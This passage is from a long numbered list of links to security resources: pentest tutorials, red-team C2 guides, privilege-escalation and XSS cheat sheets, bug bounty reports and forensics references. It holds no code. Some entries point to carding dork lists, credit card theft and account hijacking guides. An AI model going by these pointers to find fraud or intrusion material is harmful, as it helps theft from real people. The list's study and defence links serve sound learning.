https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60 -552-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60 -553-DOM XSS – auth.uber.com: https://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html -554-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -555-exploiting-adobe-coldfusion: https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html -556-Command and Control – HTTPS: https://pentestlab.blog/2017/10/04/command-and-control-https -557-Command and Control – Images: https://pentestlab.blog/2018/01/02/command-and-control-images -558-Command and Control – JavaScript: https://pentestlab.blog/2018/01/08/command-and-control-javascript -559-XSS-Payloads: https://github.com/Pgaijin66/XSS-Payloads -560-Command and Control – Web Interface: https://pentestlab.blog/2018/01/03/command-and-control-web-interface -561-Command and Control – Website: https://pentestlab.blog/2017/11/14/command-and-control-website -562-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -563-atomic-red-team: https://github.com/redcanaryco/atomic-red-team -564-PowerView-3.0-tricks.ps1: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 -565-awesome-sec-talks: https://github.com/PaulSec/awesome-sec-talks -566-Awesome-Red-Teaming: https://github.com/yeyintminthuhtut/Awesome-Red-Teaming -567-awesome-php: https://github.com/ziadoz/awesome-php -568-latest-hacks: https://hackercool.com/latest-hacks/ -569-GraphQL NoSQL Injection Through JSON Types: http://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/ -570-Writing .NET Executables for Pentesters: https://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2 -571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis. https://github.com/secfigo/Awesome-Fuzzing -572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC: http://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc -572-Injecting Metasploit Payloads into Android Applications – Manually: https://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually -573-Google Dorks For Carding [Huge List] - Part 1: https://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html -574-Google dorks for growth hackers: https://medium.com/p/7f83c8107057 -575-Google Dorks For Carding (HUGE LIST): https://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html -576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks: https://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html -577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc): https://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html -578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!: http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html -579-Hijacking VNC (Enum, Brute, Access and Crack): https://medium.com/p/d3d18a4601cc -580-Linux Post Exploitation Command List: https://github.com/mubix/post-exploitation/wiki -581-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -582-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset -583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability: https://www.securityfocus.com/bid/104407 -585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability: https://www.securityfocus.com/bid/104382 -586-miSafes Mi-Cam Device Hijacking: https://packetstormsecurity.com/files/146504/SA-20180221-0.txt -587-Low-Level Windows API Access From PowerShell: https://www.fuzzysecurity.com/tutorials/24.html -588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability: https://www.securityfocus.com/bid/103316 -589-Lateral Movement – RDP: https://pentestlab.blog/2018/04/24/lateral-movement-rdp/ -590-Snagging creds from locked machines: https://malicious.link/post/2016/snagging-creds-from-locked-machines/ -591-Making a Blind SQL Injection a Little Less Blind: https://medium.com/p/428dcb614ba8 -592-VulnHub — Kioptrix: Level 5: https://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60 -593-Unauthenticated Account Takeover Through HTTP Leak: https://medium.com/p/33386bb0ba0b -594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43 -595-Finding Target-relevant Domain Fronts: https://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44 -596-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60 -597-Cobalt Strike Visualizations: https://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60 -598-OWASP Top 10 2017 — Web Application Security Risks: https://medium.com/p/31f356491712 -599-XSS-Auditor — the protector of unprotected: https://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60 -600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine: https://gbhackers.com/netcat-vs-cryptcat -601-Jenkins Servers Infected With Miner.: https://medium.com/p/e370a900ab2e -602-cheat-sheet: http://pentestmonkey.net/category/cheat-sheet -603-Command and Control – Website Keyword: https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/ -604-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -605-Command and Control – Windows COM: https://pentestlab.blog/2017/09/01/command-and-control-windows-com/ -606-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/ -607-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -608-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -609-Reverse Engineering Android Applications: https://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/ -610-HTML Injection: https://pentestlab.blog/2013/06/26/html-injection/ -611-Meterpreter stage AV/IDS evasion with powershell: https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/ -612-Windows Atomic Tests by ATT&CK Tactic & Technique: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md -613-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware: http://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml -615-How to Bypass Anti-Virus to Run Mimikatz: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/ -616-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -617-USE TOR. USE EMPIRE.: http://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html -617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET: https://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/ -618-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -619-RED TEAM: https://bneg.io/category/red-team/ -620-PDF Tools: https://blog.didierstevens.com/programs/pdf-tools/ -621-DNS Data ex ltration — What is this and How to use? https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822 -621-Google Dorks: https://medium.com/p/7cfd432e0cf3 -622-Hacking with JSP Shells: https://blog.netspi.com/hacking-with-jsp-shells/ -623-Malware Analysis: https://github.com/RPISEC/Malware/raw/master/README.md -624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.: https://github.com/SandySekharan/CTF-tool -625-Group Policy Preferences: https://pentestlab.blog/2017/03/20/group-policy-preferences -627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -628-deobfuscation: https://furoner.wordpress.com/tag/deobfuscation/ -629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS: https://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/ -630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING: https://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/ -631-GCAT – BACKDOOR EM PYTHON: https://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/ -632-Latest Carding Dorks List for Sql njection 2019: https://latestechnews.com/carding-dorks/ -633-google docs for credit card: https://latestechnews.com/tag/google-docs-for-credit-card/ -634-How To Scan Multiple Organizations With Shodan and Golang (OSINT): https://medium.com/p/d994ba6a9587 -635-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -636-phishing: https://www.blackhillsinfosec.com/tag/phishing/ -637-Merlin in action: Intro to Merlin: https://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I -638-IP Cams from around the world: https://medium.com/p/a6f269f56805 -639-Advanced Cross Site Scripting(XSS) Cheat Sheet by Jaydeep Dabhi: https://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/ -640-Just how easy it is to do a domain or subdomain take over!?: https://medium.com/p/265d635b43d8 -641-How to Create hidden user in Remote PC: http://www.hackingarticles.in/create-hidden-remote-metaspolit -642-Process Doppelgänging – a new way to impersonate a process: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ -643-How to turn a DLL into astandalone EXE: https://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/ -644-Hijacking extensions handlers as a malware persistence method: https://hshrzd.wordpress.com/2017/05/25/hijacking-extensions-handlers-as-a-malware-persistence-method/ -645-I'll Get Your Credentials ... Later!: https://www.fuzzysecurity.com/tutorials/18.html -646-Game Over: CanYouPwnMe > Kevgir-1: https://www.fuzzysecurity.com/tutorials/26.html -647-IKARUS anti.virus and its 9 exploitable kernel vulnerabilities: http://www.greyhathacker.net/?p=995 -648-Getting started in Bug Bounty: https://medium.com/p/7052da28445a -649-Union SQLi Challenges (Zixem Write-up): https://medium.com/ctf-writeups/union-sqli-challenges-zixem-write-up-4e74ad4e88b4?source=placement_card_footer_grid---------2-60 -650-scanless – A Tool for Perform Anonymous Port Scan on Target Websites: https://gbhackers.com/scanless-port-scans-websites-behalf -651-WEBAPP PENTEST: https://securityonline.info/category/penetration-testing/webapp-pentest/ -652-Cross-Site Scripting (XSS) Payloads: https://securityonline.info/tag/cross-site-scripting-xss-payloads/ -653-sg1: swiss army knife for data encryption, exfiltration & covert communication: https://securityonline.info/tag/sg1/ -654-NETWORK PENTEST: https://securityonline.info/category/penetration-testing/network-pentest/ -655-SQL injection in an UPDATE query - a bug bounty story!: https://zombiehelp54.blogspot.com/2017/02/sql-injection-in-update-query-bug.html -656-Cross-site Scripting: https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/ -657-Local File Inclusion: https://www.netsparker.com/blog/web-security/local-file-inclusion-vulnerability/ -658-Command Injection: https://www.netsparker.com/blog/web-security/command-injection-vulnerability/ -659-a categorized list of Windows CMD commands: https://ss64.com/nt/commands.html -660-Understanding Guide for Nmap Timing Scan (Firewall Bypass): http://www.hackingarticles.in/understanding-guide-nmap-timing-scan-firewall-bypass -661-RFID Hacking with The Proxmark 3: https://blog.kchung.co/tag/rfid/ -662-A practical guide to RFID badge copying: https://blog.nviso.be/2017/01/11/a-practical-guide-to-rfid-badge-copying -663-Denial of Service using Cookie Bombing: https://medium.com/p/55c2d0ef808c -664-Vultr Domain Hijacking: https://vincentyiu.co.uk/red-team/cloud-security/vultr-domain-hijacking -665-Command and Control: https://vincentyiu.co.uk/red-team/domain-fronting -666-Cisco Auditing Tool & Cisco Global Exploiter to Exploit 14 Vulnerabilities in Cisco Switches and Routers: https://gbhackers.com/cisco-global-exploiter-cge -667-CHECKING FOR MALICIOUSNESS IN ACROFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -668-Situational Awareness: https://pentestlab.blog/2018/05/28/situational-awareness/ -669-Unquoted Service Path: https://pentestlab.blog/2017/03/09/unquoted-service-path -670-NFS: https://pentestacademy.wordpress.com/2017/09/20/nfs/ -671-List of Tools for Pentest Rookies: https://pentestacademy.wordpress.com/2016/09/20/list-of-tools-for-pentest-rookies/ -672-Common Windows Commands for Pentesters: https://pentestacademy.wordpress.com/2016/06/21/common-windows-commands-for-pentesters/ -673-Open-Source Intelligence (OSINT) Reconnaissance: https://medium.com/p/75edd7f7dada -674-OSINT x UCCU Workshop on Open Source Intelligence: https://www.slideshare.net/miaoski/osint-x-uccu-workshop-on-open-source-intelligence -675-Advanced Attack Techniques: https://www.cyberark.com/threat-research-category/advanced-attack-techniques/ -676-Credential Theft: https://www.cyberark.com/threat-research-category/credential-theft/ -678-The Cloud Shadow Admin Threat: 10 Permissions to Protect: https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/ -679-Online Credit Card Theft: Today’s Browsers Store Sensitive Information Deficiently, Putting User Data at Risk: https://www.cyberark.com/threat-research-blog/online-credit-card-theft-todays-browsers-store-sensitive-information-deficiently-putting-user-data-risk/ -680-Weakness Within: Kerberos Delegation: https://www.cyberark.com/threat-research-blog/weakness-within-kerberos-delegation/ -681-Simple Domain Fronting PoC with GAE C2 server: https://www.securityartwork.es/2017/01/31/simple-domain-fronting-poc-with-gae-c2-server/ -682-Find Critical Information about a Host using DMitry: https://www.thehackr.com/find-critical-information-host-using-dmitry/ -683-How To Do OS Fingerprinting In Kali Using Xprobe2: http://disq.us/?url=http%3A%2F%2Fwww.thehackr.com%2Fos-fingerprinting-kali%2F&key=scqgRVMQacpzzrnGSOPySA -684-Crack SSH, FTP, Telnet Logins Using Hydra: https://www.thehackr.com/crack-ssh-ftp-telnet-logins-using-hydra/ -685-Reveal Saved Passwords in Browser using JavaScript Injection: https://www.thehackr.com/reveal-saved-passwords-browser-using-javascript-injection/ -686-Nmap Cheat Sheet: https://s3-us-west-2.amazonaws.com/stationx-public-download/nmap_cheet_sheet_0.6.pdf -687-Manual Post Exploitation on Windows PC (Network Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-network-command -688-Hack Gmail or Facebook Password of Remote PC using NetRipper Exploitation Tool: http://www.hackingarticles.in/hack-gmail-or-facebook-password-of-remote-pc-using-netripper-exploitation-tool -689-Hack Locked Workstation Password in Clear Text: http://www.hackingarticles.in/hack-locked-workstation-password-clear-text -690-How to Find ALL Excel, Office, PDF, and Images in Remote PC: http://www.hackingarticles.in/how-to-find-all-excel-office-pdf-images-files-in-remote-pc -691-red-teaming: https://www.redteamsecure.com/category/red-teaming/ -692-Create a Fake AP and Sniff Data mitmAP: http://www.uaeinfosec.com/create-fake-ap-sniff-data-mitmap/ -693-Bruteforcing From Nmap Output BruteSpray: http://www.uaeinfosec.com/bruteforcing-nmap-output-brutespray/ -694-Reverse Engineering Framework radare2: http://www.uaeinfosec.com/reverse-engineering-framework-radare2/ -695-Automated ettercap TCP/IP Hijacking Tool Morpheus: http://www.uaeinfosec.com/automated-ettercap-tcpip-hijacking-tool-morpheus/ -696-List Of Vulnerable SQL Injection Sites: https://www.blogger.com/share-post.g?blogID=1175829128367570667&postID=4652029420701251199 -697-Command and Control – Gmail: https://pentestlab.blog/2017/08/03/command-and-control-gmail/ -698-Command and Control – DropBox: https://pentestlab.blog/2017/08/29/command-and-control-dropbox/ -699-Skeleton Key: https://pentestlab.blog/2018/04/10/skeleton-key/ -700-Secondary Logon Handle: https://pentestlab.blog/2017/04/07/secondary-logon-handle -701-Hot Potato: https://pentestlab.blog/2017/04/13/hot-potato -702-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -703-Linux-Kernel-exploits: http://tacxingxing.com/category/exploit/kernel-exploit/ -704-Linux-Kernel-Exploit Stack Smashing: http://tacxingxing.com/2018/02/26/linuxkernelexploit-stack-smashing/ -705-Linux Kernel Exploit Environment: http://tacxingxing.com/2018/02/15/linuxkernelexploit-huan-jing-da-jian/ -706-Linux-Kernel-Exploit NULL dereference: http://tacxingxing.com/2018/02/22/linuxkernelexploit-null-dereference/ -707-Apache mod_python for red teams: https://labs.nettitude.com/blog/apache-mod_python-for-red-teams/ -708-Bounty Write-up (HTB): https://medium.com/p/9b01c934dfd2/ 709-CTF Writeups: https://medium.com/ctf-writeups -710-Detecting Malicious Microsoft Office Macro Documents: http://www.greyhathacker.net/?p=872 -711-SQL injection in Drupal: https://hackerone.com/reports/31756 -712-XSS and open redirect on Twitter: https://hackerone.com/reports/260744 -713-Shopify login open redirect: https://hackerone.com/reports/55546 -714-HackerOne interstitial redirect: https://hackerone.com/reports/111968 -715-Ubiquiti sub-domain takeovers: https://hackerone.com/reports/181665 -716-Scan.me pointing to Zendesk: https://hackerone.com/reports/114134 -717-Starbucks' sub-domain takeover: https://hackerone.com/reports/325336 -718-Vine's sub-domain takeover: https://hackerone.com/reports/32825 -719-Uber's sub-domain takeover: https://hackerone.com/reports/175070 -720-Read access to Google: https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/ -721-A Facebook XXE with Word: https://www.bram.us/2014/12/29/how-i-hacked-facebook-with-a-word-document/ -722-The Wikiloc XXE: https://www.davidsopas.com/wikiloc-xxe-vulnerability/ -723-Uber Jinja2 TTSI: https://hackerone.com/reports/125980 -724-Uber Angular template injection: https://hackerone.com/reports/125027 -725-Yahoo Mail stored XSS: https://klikki.fi/adv/yahoo2.html -726-Google image search XSS: https://mahmoudsec.blogspot.com/2015/09/how-i-found-xss-vulnerability-in-google.html -727-Shopify Giftcard Cart XSS : https://hackerone.com/reports/95089 -728-Shopify wholesale XSS : https://hackerone.com/reports/106293 -729-Bypassing the Shopify admin authentication: https://hackerone.com/reports/270981 -730-Starbucks race conditions: https://sakurity.com/blog/2015/05/21/starbucks.html -731-Binary.com vulnerability – stealing a user's money: https://hackerone.com/reports/98247 -732-HackerOne signal manipulation: https://hackerone.com/reports/106305 -733-Shopify S buckets open: https://hackerone.com/reports/98819 -734-HackerOne S buckets open: https://hackerone.com/reports/209223 -735-Bypassing the GitLab 2F authentication: https://gitlab.com/gitlab-org/gitlab-ce/issues/14900 -736-Yahoo PHP info disclosure: https://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/ -737-Shopify for exporting installed users: https://hackerone.com/reports/96470 -738-Shopify Twitter disconnect: https://hackerone.com/reports/111216 -739-Badoo full account takeover: https://hackerone.com/reports/127703 -740-Disabling PS Logging: https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs -741-macro-less-code-exec-in-msword: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ -742-5 ways to Exploiting PUT Vulnerability: http://www.hackingarticles.in/5-ways-to-exploiting-put-vulnerabilit -743-5 Ways to Exploit Verb Tempering Vulnerability: http://www.hackingarticles.in/5-ways-to-exploit-verb-tempering-vulnerability -744-5 Ways to Hack MySQL Login Password: http://www.hackingarticles.in/5-ways-to-hack-mysql-login-password -745-5 Ways to Hack SMB Login Password: http://www.hackingarticles.in/5-ways-to-hack-smb-login-password -746-6 Ways to Hack FTP Login Password: http://www.hackingarticles.in/6-ways-to-hack-ftp-login-password -746-6 Ways to Hack SNMP Password: http://www.hackingarticles.in/6-ways-to-hack-snmp-password -747-6 Ways to Hack VNC Login Password: http://www.hackingarticles.in/6-ways-to-hack-vnc-login-password -748-Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter: http://www.hackingarticles.in/access-sticky-keys-backdoor-remote-pc-sticky-keys-hunter -749-Beginner Guide to IPtables: http://www.hackingarticles.in/beginner-guide-iptables -750-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -751-Exploit Remote Windows 10 PC using Discover Tool: http://www.hackingarticles.in/exploit-remote-windows-10-pc-using-discover-tool -752-Forensics Investigation of Remote PC (Part 2): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-2 -753-5 ways to File upload vulnerability Exploitation: http://www.hackingarticles.in/5-ways-file-upload-vulnerability-exploitation -754-FTP Penetration Testing in Ubuntu (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-in-ubuntu-port-21 -755-FTP Penetration Testing on Windows (Port 21): http://www.hackingarticles.in/ftp-penetration-testing-windows -756-FTP Pivoting through RDP: http://www.hackingarticles.in/ftp-pivoting-rdp -757-Fun with Metasploit Payloads: http://www.hackingarticles.in/fun-metasploit-payloads -758-Gather Cookies and History of Mozilla Firefox in Remote Windows, Linux or MAC PC: http://www.hackingarticles.in/gather-cookies-and-history-of-mozilla-firefox-in-remote-windows-linux-or-mac-pc -759-Generating Reverse Shell using Msfvenom (One Liner Payload): http://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload -760-Generating Scan Reports Using Nmap (Output Scan): http://www.hackingarticles.in/generating-scan-reports-using-nmap-output-scan -761-Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled): http://www.hackingarticles.in/get-meterpreter-session-locked-pc-remotely-remote-desktop-enabled -762-Hack ALL Security Features in Remote Windows 7 PC: http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc -763-5 ways to Exploit LFi Vulnerability: http://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability -764-5 Ways to Directory Bruteforcing on Web Server: http://www.hackingarticles.in/5-ways-directory-bruteforcing-web-server -765-Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit -766-Hack Gmail and Facebook Password in Network using Bettercap: http://www.hackingarticles.in/hack-gmail-facebook-password-network-using-bettercap -767-ICMP Penetration Testing: http://www.hackingarticles.in/icmp-penetration-testing -768-Understanding Guide to Mimikatz: http://www.hackingarticles.in/understanding-guide-mimikatz -769-5 Ways to Create Dictionary for Bruteforcing: http://www.hackingarticles.in/5-ways-create-dictionary-bruteforcing -770-Linux Privilege Escalation using LD_Preload: http://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/ -771-2 Ways to Hack Remote Desktop Password using kali Linux: http://www.hackingarticles.in/2-ways-to-hack-remote-desktop-password-using-kali-linux -772-2 ways to use Msfvenom Payload with Netcat: http://www.hackingarticles.in/2-ways-use-msfvenom-payload-netcat -773-4 ways to Connect Remote PC using SMB Port: http://www.hackingarticles.in/4-ways-connect-remote-pc-using-smb-port -774-4 Ways to DNS Enumeration: http://www.hackingarticles.in/4-ways-dns-enumeration -775-4 Ways to get Linux Privilege Escalation: http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation -776-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -777-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -778-OSINT Cheat Sheet: https://hack2interesting.com/osint-cheat-sheet/ -779-OSINT Cheat Sheet: https://infoskirmish.com/osint-cheat-sheet/ -780-OSINT Links for Investigators: https://i-sight.com/resources/osint-links-for-investigators/ -781- Metasploit Cheat Sheet : https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html -782- Exploit Development Cheat Sheet: https://github.com/coreb1t/awesome-pentest-cheat-sheets/commit/5b83fa9cfb05f4774eb5e1be2cde8dbb04d011f4 -783-Building Profiles for a Social Engineering Attack: https://pentestlab.blog/2012/04/19/building-profiles-for-a-social-engineering-attack/ -784-Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes): https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html -785-Getting the goods with CrackMapExec: Part 2: https://byt3bl33d3r.github.io/tag/crackmapexec.html -786-Bug Hunting Methodology (part-1): https://medium.com/p/91295b2d2066 -787-Exploring Cobalt Strike's ExternalC2 framework: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/ -788-Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities: https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/ -789-Adversarial Tactics, Techniques & Common Knowledge: https://attack.mitre.org/wiki/Main_Page -790-Bug Bounty — Tips / Tricks / JS (JavaScript Files): https://medium.com/p/bdde412ea49d -791-Bug Bounty Hunting Tips #2 —Target their mobile apps (Android Edition): https://medium.com/p/f88a9f383fcc -792-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -793-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -794-ClickOnce (Twice or Thrice): A Technique for Social Engineering and (Un)trusted Command Execution: https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/ -795-Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 2): https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ -796-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -797-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -798-DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ -799-Abusing Exported Functions and Exposed DCOM Interfaces for Pass-Thru Command Execution and Lateral Movement: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ -800-Capcom Rootkit Proof-Of-Concept: https://www.fuzzysecurity.com/tutorials/28.html -801-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -802-Beginners Guide for John the Ripper (Part 1): http://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -803-Working of Traceroute using Wireshark: http://www.hackingarticles.in/working-of-traceroute-using-wireshark/ -804-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file/ -805-4 ways to SMTP Enumeration: http://www.hackingarticles.in/4-ways-smtp-enumeration -806-4 ways to Hack MS SQL Login Password: http://www.hackingarticles.in/4-ways-to-hack-ms-sql-login-password -807-4 Ways to Hack Telnet Passsword: http://www.hackingarticles.in/4-ways-to-hack-telnet-passsword -808-5 ways to Brute Force Attack on WordPress Website: http://www.hackingarticles.in/5-ways-brute-force-attack-wordpress-website -809-5 Ways to Crawl a Website: http://www.hackingarticles.in/5-ways-crawl-website -810-Local Linux Enumeration & Privilege Escalation Cheatsheet: https://www.rebootuser.com/?p=1623 -811-The Drebin Dataset: https://www.sec.cs.tu-bs.de/~danarp/drebin/download.html -812-ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else: https://www.slideshare.net/x00mario/es6-en -813-IT and Information Security Cheat Sheets: https://zeltser.com/cheat-sheets/ -814-Cheat Sheets - DFIR Training: https://www.dfir.training/cheat-sheets -815-WinDbg Malware Analysis Cheat Sheet: https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/ -819-Cheat Sheet for Analyzing Malicious Software: https://www.prodefence.org/cheat-sheet-for-analyzing-malicious-software/ -820-Analyzing Malicious Documents Cheat Sheet - Prodefence: https://www.prodefence.org/analyzing-malicious-documents-cheat-sheet-2/ -821-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -822-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -823-Windows Registry Auditing Cheat Sheet: https://www.slideshare.net/Hackerhurricane/windows-registry-auditing-cheat-sheet-ver-jan-2016-malwarearchaeology -824-Cheat Sheet of Useful Commands Every Kali Linux User Needs To Know: https://kennyvn.com/cheatsheet-useful-bash-commands-linux/ -825-kali-linux-cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -826-8 Best Kali Linux Terminal Commands used by Hackers (2019 Edition): https://securedyou.com/best-kali-linux-commands-terminal-hacking/ -827-Kali Linux Commands Cheat Sheet: https://www.pinterest.com/pin/393431717429496576/ -827-Kali Linux Commands Cheat Sheet A To Z: https://officialhacker.com/linux-commands-cheat-sheet/ -828-Linux commands CHEATSHEET for HACKERS: https://www.reddit.com/r/Kalilinux/.../linux_commands_cheatsheet_for_hackers/ -829-100 Linux Commands – A Brief Outline With Cheatsheet: 